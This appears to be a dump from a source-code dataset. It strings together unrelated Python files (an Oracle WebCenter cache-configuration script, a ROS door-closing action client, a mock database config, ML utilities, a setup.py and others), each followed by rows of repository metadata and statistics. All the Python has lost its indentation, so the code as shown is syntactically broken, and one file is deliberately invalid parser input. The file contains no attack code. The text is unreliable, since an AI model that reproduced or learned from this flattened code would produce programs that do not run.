# Get dataset length in terms of video frames and start frame for each video
self.start_frames = []
self.len = len(image_data)
self.seen = 0
self.samples_cmd = {0: [], 1: [], 2: [], 3: [], 4: [], 5: []}
self.samples_idx = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0}
self._population = [0, 1, 2, 3, 4, 5]
self._weights = prob_weights
self._split_samples()
for key in self.samples_cmd.keys():
np.random.shuffle(self.samples_cmd[key])
def __len__(self):
return self.len
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
# added this while because samples_cmd[sample_type] could be empty
while True:
sample_type = np.random.choice(self._population, p=self._weights)
if self.samples_cmd[sample_type]:
break
idx = self.samples_cmd[sample_type][self.samples_idx[sample_type]]
self.samples_idx[sample_type] += 1
if self.samples_idx[sample_type] >= len(self.samples_cmd[sample_type]):
self.samples_idx[sample_type] = 0
np.random.shuffle(self.samples_cmd[sample_type])
self.seen += 1
if self.seen >= self.len:
for key in self.samples_cmd.keys():
np.random.shuffle(self.samples_cmd[key])
self.samples_idx[key] = 0
self.seen = 0
raise StopIteration
return idx
def _split_samples(self):
index = 0
for j in range(len(self.image_data)):
cmd = self.image_data[j]
self.samples_cmd[cmd].append(index)
index += 1
if __name__ == '__main__':
dataset = KITTISegmentation()
| 36.880208 | 141 | 0.591018 | 876 | 7,081 | 4.550228 | 0.240868 | 0.044155 | 0.035123 | 0.019568 | 0.27421 | 0.223281 | 0.14576 | 0.103864 | 0.103864 | 0.103864 | 0 | 0.014173 | 0.282587 | 7,081 | 191 | 142 | 37.073298 | 0.770472 | 0.09815 | 0 | 0.130081 | 0 | 0 | 0.049421 | 0.016535 | 0 | 0 | 0 | 0 | 0.04065 | 0 | null | null | 0 | 0.04065 | null | null | 0.00813 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7ee6d842483ab8133f076264eb1658607e7ec98 | 5,558 | py | Python | FMWKubernetesMAA/OracleEnterpriseDeploymentAutomation/OracleWebCenterSites/charts/wc-sites/unicast.py | rishiagarwal-oracle/fmw-kubernetes | cf53d0aac782cacaa26cb1f8f1cdb7130f69d64f | [
"UPL-1.0",
"MIT"
] | null | null | null | FMWKubernetesMAA/OracleEnterpriseDeploymentAutomation/OracleWebCenterSites/charts/wc-sites/unicast.py | rishiagarwal-oracle/fmw-kubernetes | cf53d0aac782cacaa26cb1f8f1cdb7130f69d64f | [
"UPL-1.0",
"MIT"
] | null | null | null | FMWKubernetesMAA/OracleEnterpriseDeploymentAutomation/OracleWebCenterSites/charts/wc-sites/unicast.py | rishiagarwal-oracle/fmw-kubernetes | cf53d0aac782cacaa26cb1f8f1cdb7130f69d64f | [
"UPL-1.0",
"MIT"
] | null | null | null | # Copyright (c) 2022, Oracle and/or its affiliates.
#
# Licensed under the Universal Permissive License v 1.0 as shown at
# https://oss.oracle.com/licenses/upl
import xml.dom.minidom
import re
import sys
def getManagedServerCount(domainHome):
# use the parse() function to load and parse an XML file
doc = xml.dom.minidom.parse(domainHome + "/config/config.xml")
servers = doc.getElementsByTagName("server")
print "Total Configured Managed Servers: %d " % (servers.length - 1)
return servers.length - 1;
# Method to uncomment and comment the required tag and save back
def replaceXml(domainHome, ms_server):
f = open(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/ticket-cache.xml","r+w")
filecontent = f.read()
#Uncomment the one to be used
filecontent = re.sub ( r'<!--<cacheManagerPeerProviderFactory','<cacheManagerPeerProviderFactory', filecontent,1)
filecontent = re.sub ( r'cas_tgt" />-->','cas_tgt" />', filecontent,1)
#Comment the one not used
filecontent = re.sub ( r'<cacheManagerPeerProviderFactory','<!--cacheManagerPeerProviderFactory', filecontent,1)
filecontent = re.sub ( r'propertySeparator="," />','propertySeparator="," -->', filecontent,1)
f.seek(0)
f.write(filecontent)
f.write("\n\n\n")
f.close()
# Method to replace the properties
def replaceRmiUrlsInCache(domainHome, prefix, n, ms_server, excludedServerNumber, filename, port):
doc = xml.dom.minidom.parse(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/" + filename)
abc = doc.getElementsByTagName("cacheManagerPeerProviderFactory")
processString = "peerDiscovery=manual,rmiUrls=//localhost:<port>/notifier"
for element in abc:
element.setAttribute("properties", processString)
for x in range (1,n-1):
processString = processString + "|//localhost:<port>/notifier"
# We should have got the properties attribute now tokenized with localhost and 41001. Exclude 1 add the rest
for i in range (1,n+1):
if i <> int(excludedServerNumber):
processString = re.sub ( r'localhost',prefix + str(i), processString,1)
processString = re.sub ( r'<port>',str(port), processString,1)
element.setAttribute("properties", processString)
print(processString)
ghi = doc.getElementsByTagName("cacheManagerPeerListenerFactory")
for element in ghi:
processString = element.getAttribute("properties")
processString = "hostName="+prefix+ str(excludedServerNumber) +",port=" + str(port) +",remoteObjectPort=" + str(int(port)+1) + ",socketTimeoutMillis=12000"
element.setAttribute("properties", processString)
myfile = open(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/" + filename , "w")
myfile.write(doc.toxml())
myfile.close()
print("Updated " + filename)
# Method to replace the properties
def replaceRmiUrls(domainHome, prefix, n, ms_server, excludedServerNumber, port):
doc = xml.dom.minidom.parse(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/ticket-cache.xml")
abc = doc.getElementsByTagName("cacheManagerPeerProviderFactory")
processString = ""
for element in abc:
processString = element.getAttribute("properties")
for x in range (1,n-1):
processString = processString + "|//localhost:41001/cas_st|//localhost:41001/cas_tgt"
# We should have got the properties attribute now tokenized with localhost and 41001. Exclude 1 add the rest
for i in range (1,n+1):
if i <> int(excludedServerNumber):
processString = re.sub ( r'localhost',prefix + str(i), processString,1)
processString = re.sub ( r'41001',str(port), processString,1)
processString = re.sub ( r'localhost',prefix + str(i), processString,1)
processString = re.sub ( r'41001',str(port), processString,1)
element.setAttribute("properties", processString)
print(processString)
ghi = doc.getElementsByTagName("cacheManagerPeerListenerFactory")
for element in ghi:
processString = element.getAttribute("properties")
processString = "hostName=" + prefix + str(excludedServerNumber) + ",port=" + str(port) + ",remoteObjectPort=" + str(int(port)+1) + ",socketTimeoutMillis=12000"
element.setAttribute("properties", processString)
myfile = open(domainHome + "/config/fmwconfig/servers/" + ms_server + "/config/ticket-cache.xml", "w")
myfile.write(doc.toxml())
myfile.close()
print("Updated " + "ticket-cache.xml")
def main():
# count the arguments
arguments = len(sys.argv) - 1
print ("The script is called with %i arguments" % (arguments))
domainHome = sys.argv[1]
serverPrefix = sys.argv[2]
ms_server = sys.argv[3]
port = sys.argv[4]
excludedServerNumber = ms_server[-1]
print("Host prefix set to " + serverPrefix)
print("Managed Server set to - " + ms_server)
print("Excluded Server Number set to - " + excludedServerNumber)
print("Starting port set to - " + port)
replaceXml(domainHome, ms_server)
servercount = getManagedServerCount(domainHome)
replaceRmiUrls(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, port)
replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "linked-cache.xml", int(port) + 2)
replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "cs-cache.xml", int(port) + 4)
replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "cas-cache.xml", int(port) + 6 )
replaceRmiUrlsInCache(domainHome, serverPrefix, servercount, ms_server, excludedServerNumber, "ss-cache.xml", int(port) + 8 )
if __name__ == "__main__":
# calling main function
main()
| 45.933884 | 161 | 0.737496 | 656 | 5,558 | 6.204268 | 0.239329 | 0.033415 | 0.014742 | 0.02801 | 0.659951 | 0.625553 | 0.573219 | 0.483538 | 0.479607 | 0.458477 | 0 | 0.016722 | 0.128463 | 5,558 | 120 | 162 | 46.316667 | 0.823493 | 0.115869 | 0 | 0.397727 | 0 | 0 | 0.250663 | 0.140845 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.034091 | null | null | 0.113636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7f60dd013f54bbf4fa181ff948f295cdc87e462 | 1,893 | py | Python | tests/mock_dbcli_config.py | bluelabsio/db-facts | fc8faa59f450a5cc00a0e50160ca57e47291b375 | [
"Apache-2.0"
] | 2 | 2020-11-25T20:11:50.000Z | 2020-12-12T18:39:09.000Z | tests/mock_dbcli_config.py | bluelabsio/db-facts | fc8faa59f450a5cc00a0e50160ca57e47291b375 | [
"Apache-2.0"
] | 5 | 2020-01-24T15:05:50.000Z | 2020-02-29T13:34:40.000Z | tests/mock_dbcli_config.py | bluelabsio/db-facts | fc8faa59f450a5cc00a0e50160ca57e47291b375 | [
"Apache-2.0"
] | 1 | 2021-05-16T17:07:40.000Z | 2021-05-16T17:07:40.000Z | mock_dbcli_config = {
'exports_from': {
'lpass': {
'pull_lastpass_from': "{{ lastpass_entry }}",
},
'lpass_user_and_pass_only': {
'pull_lastpass_username_password_from': "{{ lastpass_entry }}",
},
'my-json-script': {
'json_script': [
'some-custom-json-script'
]
},
'invalid-method': {
},
},
'dbs': {
'baz': {
'exports_from': 'my-json-script',
},
'bing': {
'exports_from': 'invalid-method',
},
'bazzle': {
'exports_from': 'lpass',
'lastpass_entry': 'lpass entry name'
},
'bazzle-bing': {
'exports_from': 'lpass',
'lastpass_entry': 'different lpass entry name'
},
'frazzle': {
'exports_from': 'lpass',
'lastpass_entry': 'lpass entry name'
},
'frink': {
'exports_from': 'lpass_user_and_pass_only',
'lastpass_entry': 'lpass entry name',
'jinja_context_name': 'standard',
'exports': {
'some_additional': 'export',
'a_numbered_export': 123
},
},
'gaggle': {
'jinja_context_name': [
'env',
'base64',
],
'exports': {
'type': 'bigquery',
'protocol': 'bigquery',
'bq_account': 'bq_itest',
'bq_service_account_json':
"{{ env('ITEST_BIGQUERY_SERVICE_ACCOUNT_JSON_BASE64') | b64decode }}",
'bq_default_project_id': 'bluelabs-tools-dev',
'bq_default_dataset_id': 'bq_itest',
},
},
},
'orgs': {
'myorg': {
'full_name': 'MyOrg',
},
},
}
| 28.253731 | 86 | 0.43159 | 145 | 1,893 | 5.255172 | 0.406897 | 0.10105 | 0.104987 | 0.094488 | 0.238845 | 0.112861 | 0.112861 | 0.112861 | 0 | 0 | 0 | 0.008212 | 0.421025 | 1,893 | 66 | 87 | 28.681818 | 0.687044 | 0 | 0 | 0.106061 | 0 | 0 | 0.445325 | 0.116746 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e7fca0855906e19926ef43a259b033f9d1d6ddb0 | 542 | py | Python | transform/indexed_transform.py | cviaai/unsupervised-heartbeat-anomaly-detection | 3586bf505256463c030422607e95e4cee40fa086 | [
"MIT"
] | 2 | 2020-10-14T05:50:25.000Z | 2021-05-11T03:42:02.000Z | transform/indexed_transform.py | cviaai/unsupervised-heartbeat-anomaly-detection | 3586bf505256463c030422607e95e4cee40fa086 | [
"MIT"
] | null | null | null | transform/indexed_transform.py | cviaai/unsupervised-heartbeat-anomaly-detection | 3586bf505256463c030422607e95e4cee40fa086 | [
"MIT"
] | null | null | null | from typing import Tuple, List
from transform.transformer import TimeSeriesTransformer
import numpy as np
class IndexedTransformer:
def __init__(self, transformer: TimeSeriesTransformer, padding: int, step: int):
self.transformer = transformer
self.padding = padding
self.step = step
def __call__(self, data: np.ndarray) -> Tuple[List[int], np.ndarray]:
tr_data = self.transformer(data)
indices = [self.padding + i * self.step for i in range(len(tr_data))]
return indices, tr_data
| 30.111111 | 84 | 0.695572 | 67 | 542 | 5.462687 | 0.447761 | 0.122951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215867 | 542 | 17 | 85 | 31.882353 | 0.861176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.25 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
e7fca20cce05d1364eee53a17bec476012eb661d | 2,177 | py | Python | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-12T18:00:50.000Z | 2020-12-19T23:49:16.000Z | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | null | null | null | dropconnect/combine_pred_mod.py | zygmuntz/kaggle-cifar | 16936af9cf621d668c50491291e042a7849a1ac3 | [
"BSD-2-Clause"
] | 26 | 2015-01-10T22:35:01.000Z | 2020-01-15T08:56:53.000Z | #------------------------------------------
# this script combine result of different
# nets and report final result
#------------------------------------------
import sys
import numpy as np
from util import pickle, unpickle
def evaluate_result( result, text ):
# pre-condition check
num_batches = len( result['labels'] )
assert( num_batches == len(result['labels']) )
# compute error
num_cases = 0
num_wrong = 0
for ii in range( num_batches ):
act_index = result['labels'][ii]
num_cases_ii = act_index.shape[0]
assert( num_cases_ii == result['preds'][ii].shape[0] )
num_cases += num_cases_ii
pred_index = np.argmax( result['preds'][ii], 1 )
for jj in range( num_cases_ii ):
if pred_index[jj] != act_index[jj]:
num_wrong += 1
print text + "----Testing Error: %2.4f" % ( 1.0 *num_wrong / num_cases )
return ( 1.0 *num_wrong / num_cases )
def main():
num_args = len(sys.argv)
# load result from file
num_nets = num_args - 1
assert( num_nets > 0 )
errors = []
# 0th net
# result['labels']
# result['preds']
result = unpickle( sys.argv[1] )
errors.append( evaluate_result( result, sys.argv[1] ) )
num_batches = len( result['labels'] )
#import pdb; pdb.set_trace()
# collet all results
for ii in range( num_nets - 1 ):
result_ii = unpickle( sys.argv[ii+2] )
# evaluate result_ii
errors.append( evaluate_result( result_ii, sys.argv[ii+2] ) )
# check num of batches is consistant
num_batches_ii = len( result_ii['labels'] )
for jj in range( num_batches ):
# check label is consistant
assert( np.array_equal(
result_ii['labels'][jj], result['labels'][jj] ) )
# nc result['pred'][jj]
result['preds'][jj] += result_ii['preds'][jj]
pickle( 'combine_result', result )
# classifier mean/std accuracy
errors = np.array( errors )
#import pdb; pdb.set_trace()
print "mean: " , str(100*np.mean( errors )) , " std: " , str(100*(np.std( errors )))
# evaluate result
evaluate_result( result, "After combine" )
if __name__ == "__main__":
main()
| 30.661972 | 87 | 0.592559 | 291 | 2,177 | 4.243986 | 0.281787 | 0.051822 | 0.064777 | 0.046154 | 0.222672 | 0.02915 | 0 | 0 | 0 | 0 | 0 | 0.015682 | 0.238401 | 2,177 | 70 | 88 | 31.1 | 0.729192 | 0.216812 | 0 | 0.04878 | 0 | 0 | 0.078885 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 0 | null | null | 0 | 0.073171 | null | null | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7fcb403c125d5647a5fdcb4339ffbade5bc81e8 | 1,556 | py | Python | goless/__init__.py | ctismer/goless | 02168a40902691264b32c7da6f453819ed7a91cf | [
"Apache-2.0"
] | 1 | 2015-05-28T03:12:47.000Z | 2015-05-28T03:12:47.000Z | goless/__init__.py | ctismer/goless | 02168a40902691264b32c7da6f453819ed7a91cf | [
"Apache-2.0"
] | null | null | null | goless/__init__.py | ctismer/goless | 02168a40902691264b32c7da6f453819ed7a91cf | [
"Apache-2.0"
] | null | null | null | """
``goless`` introduces go-like channels and select to Python,
built on top of Stackless Python (and maybe one day gevent).
Use :func:`goless.chan` to create a synchronous or buffered channel.
Use :func:`goless.select` like you would the ``Select`` function in Go's reflect package
(since Python lacks a switch/case statement, replicating Go's select statement syntax
wasn't very effective).
"""
import logging
import sys
import traceback
from .backends import current as _be
# noinspection PyUnresolvedReferences
from .channels import chan, ChannelClosed
# noinspection PyUnresolvedReferences
from .selecting import dcase, rcase, scase, select
version_info = 0, 0, 1
version = '.'.join([str(v) for v in version_info])
def on_panic(etype, value, tb):
"""
Called when there is an unhandled error in a goroutine.
By default, logs and exits the process.
"""
logging.critical(traceback.format_exception(etype, value, tb))
_be.propagate_exc(SystemExit, 1)
def go(func, *args, **kwargs):
"""
Run a function in a new tasklet, like a goroutine.
If the goroutine raises an unhandled exception (*panics*),
the :func:`goless.on_panic` will be called,
which by default logs the error and exits the process.
:param args: Positional arguments to ``func``.
:param kwargs: Keyword arguments to ``func``.
"""
def safe_wrapped(f):
# noinspection PyBroadException
try:
f(*args, **kwargs)
except:
on_panic(*sys.exc_info())
_be.start(safe_wrapped, func)
| 30.509804 | 88 | 0.703728 | 215 | 1,556 | 5.032558 | 0.534884 | 0.027726 | 0.02403 | 0.033272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00321 | 0.199229 | 1,556 | 50 | 89 | 31.12 | 0.865169 | 0.572622 | 0 | 0 | 0 | 0 | 0.001664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e7fcf109cce1b1c57ca682a8b6f5606efb8ee46b | 643 | py | Python | data/test1.py | moses-alexander/simple-python-parser | a15f53a86d61fa5d98f5ade149d8c3a178ebfb50 | [
"BSD-3-Clause"
] | null | null | null | data/test1.py | moses-alexander/simple-python-parser | a15f53a86d61fa5d98f5ade149d8c3a178ebfb50 | [
"BSD-3-Clause"
] | null | null | null | data/test1.py | moses-alexander/simple-python-parser | a15f53a86d61fa5d98f5ade149d8c3a178ebfb50 | [
"BSD-3-Clause"
] | null | null | null | 1+2
3+5
7+8
6>7
abs(-3)
if 8 < 9: min(3,5)
else 4 < 5: abs(-2)
else 4 > 5: max(3, 7)
round(2.1)
round(3.6)
len("jfdgge")
type(4)
any(1, 3, 4)
any(0.0, 0.0, 0.0)
all("abc", "a")
all(0, 1)
bin(45)
lower("ABC")
upper("abc")
join("abc", "abc")
bool(0)
bool("abc")
ord('r')
chr(100)
str(130)
globals()
help()
hex(15)
oct(27)
pow(4,2)
sum(1,2, 3)
id(4)
id("abc")
not False
none()
none(0)
# breaks here ... for now
b = 1
print("a", b); print();
a = 5
#def append_element(self, val): newest =__Node(val);newestprev = self__trailerprev;self__trailerprevnext = newest;self__trailerprev = newest;newestnext = self__trailer;self__size = self__size + 1;
| 14.613636 | 196 | 0.62986 | 132 | 643 | 2.954545 | 0.5 | 0.025641 | 0.030769 | 0.030769 | 0.015385 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107078 | 0.143079 | 643 | 43 | 197 | 14.953488 | 0.600726 | 0.339036 | 0 | 0 | 0 | 0 | 0.07109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7ffb07502a866daacad535d6c162c3df47ed0fa | 1,075 | py | Python | 001-050/029-divide-two-integers.py | bbram10/leetcode-master | 565f5f0cb3c9720e59a78ddf2e5e6e829c70bac6 | [
"MIT"
] | 134 | 2017-01-16T11:17:44.000Z | 2022-03-16T17:13:26.000Z | 001-050/029-divide-two-integers.py | bbram10/leetcode-master | 565f5f0cb3c9720e59a78ddf2e5e6e829c70bac6 | [
"MIT"
] | 1 | 2019-11-18T02:10:51.000Z | 2019-11-18T02:10:51.000Z | 001-050/029-divide-two-integers.py | bbram10/leetcode-master | 565f5f0cb3c9720e59a78ddf2e5e6e829c70bac6 | [
"MIT"
] | 54 | 2017-07-17T01:24:00.000Z | 2022-02-06T05:28:44.000Z | """
STATEMENT
Divide two integers without using multiplication, division and mod operator.
CLARIFICATIONS
- Do I have to handle 32-bit integer overflow? Yes, return the MAX_INT in that case.
- Can the divisor be zero? Yes, return the MAX_INT.
EXAMPLES
34/3 -> 11
COMMENTS
- This solution is by tusizi in Leetcode (picked up from https://discuss.leetcode.com/topic/8714/clear-python-code)
"""
def divide(dividend, divisor):
"""
:type dividend: int
:type divisor: int
:rtype: int
"""
sign = (dividend < 0) is (divisor < 0)
dividend, divisor = abs(dividend), abs(divisor)
INT_MIN, INT_MAX = -2147483648, 2147483647
if (not divisor) or (dividend < INT_MIN and divisor == -1):
return INT_MAX
to_return = 0
while dividend >= divisor:
temp, i = divisor, 1
while dividend >= temp:
dividend -= temp
to_return += i
i <<= 1
temp <<= 1
if not sign:
to_return = -to_return
return min(max(INT_MIN, to_return), INT_MAX)
| 27.564103 | 115 | 0.613953 | 144 | 1,075 | 4.493056 | 0.493056 | 0.061824 | 0.037094 | 0.046368 | 0.055641 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049673 | 0.288372 | 1,075 | 38 | 116 | 28.289474 | 0.796078 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f000c275681d6eb860ca8edd89619bd04e3efa9d | 508 | py | Python | conv/setup.py | hughpyle/GW-BASIC | f0c1ef3c9655b36cd312d18e4620bb076f03afd3 | [
"MIT"
] | 26 | 2020-05-23T18:09:05.000Z | 2022-01-30T10:07:04.000Z | conv/setup.py | hughpyle/GW-BASIC | f0c1ef3c9655b36cd312d18e4620bb076f03afd3 | [
"MIT"
] | 1 | 2020-06-25T06:20:01.000Z | 2020-06-25T06:20:01.000Z | conv/setup.py | hughpyle/GW-BASIC | f0c1ef3c9655b36cd312d18e4620bb076f03afd3 | [
"MIT"
] | 4 | 2020-05-23T12:36:44.000Z | 2022-01-16T00:20:20.000Z | from setuptools import setup, find_packages
"""
https://tia.mat.br/posts/2020/06/21/converting-gwbasic-to-z80.html
"""
setup(
name="z80conv",
version='0.0.1',
author="lp",
description="Porting GW-BASIC from 8086 back to the Z80",
license="GPLv2",
packages=find_packages(),
long_description="Porting GW-BASIC from 8086 back to the Z80",
install_requires=[],
tests_require=['pytest'],
entry_points = {
'console_scripts': ['z80conv=z80conv.conv:main'],
}
)
| 24.190476 | 66 | 0.661417 | 67 | 508 | 4.910448 | 0.701493 | 0.072948 | 0.121581 | 0.151976 | 0.273556 | 0.273556 | 0.273556 | 0.273556 | 0.273556 | 0.273556 | 0 | 0.077108 | 0.183071 | 508 | 20 | 67 | 25.4 | 0.715663 | 0 | 0 | 0 | 0 | 0 | 0.343318 | 0.057604 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f00829ce69ca21d2a75d867579f5065b5c43824d | 395 | py | Python | lib/locator/location_test.py | alt-locator/address-locator-python | 9f052dc7721223bde926723648790a17b06e9d7a | [
"MIT"
] | null | null | null | lib/locator/location_test.py | alt-locator/address-locator-python | 9f052dc7721223bde926723648790a17b06e9d7a | [
"MIT"
] | null | null | null | lib/locator/location_test.py | alt-locator/address-locator-python | 9f052dc7721223bde926723648790a17b06e9d7a | [
"MIT"
] | null | null | null | import location
import unittest
class LocationTest(unittest.TestCase):
def testToJson(self):
test_location = location.Location(name='foo',
local_ip_address={'en0': {'local_ip_address': '1.2.3.4'}})
test_json = test_location.to_json()
self.assertEqual(test_json['name'], 'foo')
self.assertEqual(test_json['local_ip_address']['en0']['local_ip_address'],
'1.2.3.4')
| 30.384615 | 78 | 0.698734 | 55 | 395 | 4.763636 | 0.418182 | 0.10687 | 0.21374 | 0.129771 | 0.267176 | 0.267176 | 0.267176 | 0.267176 | 0.267176 | 0.267176 | 0 | 0.02924 | 0.134177 | 395 | 12 | 79 | 32.916667 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0.197468 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f00b1f413db4083c2b4c12dfb8af15b799f387ae | 2,288 | py | Python | mtconnect/mtconnect_ros_bridge/scripts/closedoor.py | mtconnect/ros_bridge | b578e8c3edca83ea0de8ed15aff0f7733dd23e04 | [
"Apache-2.0"
] | 5 | 2015-04-30T21:51:46.000Z | 2019-03-18T06:24:38.000Z | mtconnect/mtconnect_ros_bridge/scripts/closedoor.py | CubeSpawn/ros_bridge | b578e8c3edca83ea0de8ed15aff0f7733dd23e04 | [
"Apache-2.0"
] | null | null | null | mtconnect/mtconnect_ros_bridge/scripts/closedoor.py | CubeSpawn/ros_bridge | b578e8c3edca83ea0de8ed15aff0f7733dd23e04 | [
"Apache-2.0"
] | 4 | 2016-02-21T20:04:31.000Z | 2021-01-04T13:48:41.000Z | #! /usr/bin/env python
"""
Copyright 2013 Southwest Research Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import roslib; roslib.load_manifest('mtconnect_msgs')
import rospy
# Brings in the SimpleActionClient
import actionlib
# Brings in the messages used by the material_load action.
import mtconnect_msgs.msg
def close_door_client():
rospy.loginfo('Launched CloseDoor Action CLient')
# Creates the SimpleActionClient, passing the type of the action
# (CloseDoorAction) to the constructor.
client = actionlib.SimpleActionClient('CloseDoorClient', mtconnect_msgs.msg.CloseDoorAction)
# Waits until the action server has started up and started listening for goals.
rospy.loginfo('Waiting for Generic Action Server')
client.wait_for_server()
rospy.loginfo('Generic Action Server Activated')
# Creates a DoorAcknowledge goal to send to the action server.
goal = mtconnect_msgs.msg.CloseDoorGoal()
goal.close_door = 'CLOSED'
# Sends the goal to the action server.
rospy.loginfo('Sending the goal')
client.send_goal(goal)
# Waits for the server to finish performing the action.
rospy.loginfo('Waiting for result')
client.wait_for_result()
# Obtain result
result = client.get_result() # result must be a string
rospy.loginfo('Returning the result --> %s' % result)
return
if __name__ == '__main__':
try:
# Initializes a rospy node so that the SimpleActionClient can
# publish and subscribe over ROS.
rospy.init_node('CloseDoorActionClient')
result = close_door_client()
rospy.loginfo('Action Result --> %s' % result)
except rospy.ROSInterruptException:
print 'program interrupted before completion'
| 34.666667 | 96 | 0.723776 | 297 | 2,288 | 5.488215 | 0.491582 | 0.051534 | 0.029448 | 0.019632 | 0.033129 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004403 | 0.205857 | 2,288 | 65 | 97 | 35.2 | 0.89268 | 0.25 | 0 | 0 | 0 | 0 | 0.254579 | 0.019231 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
